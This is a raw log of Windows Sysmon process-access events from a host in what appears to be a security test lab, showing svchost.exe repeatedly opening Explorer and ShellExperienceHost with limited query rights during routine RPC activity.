07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.673{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
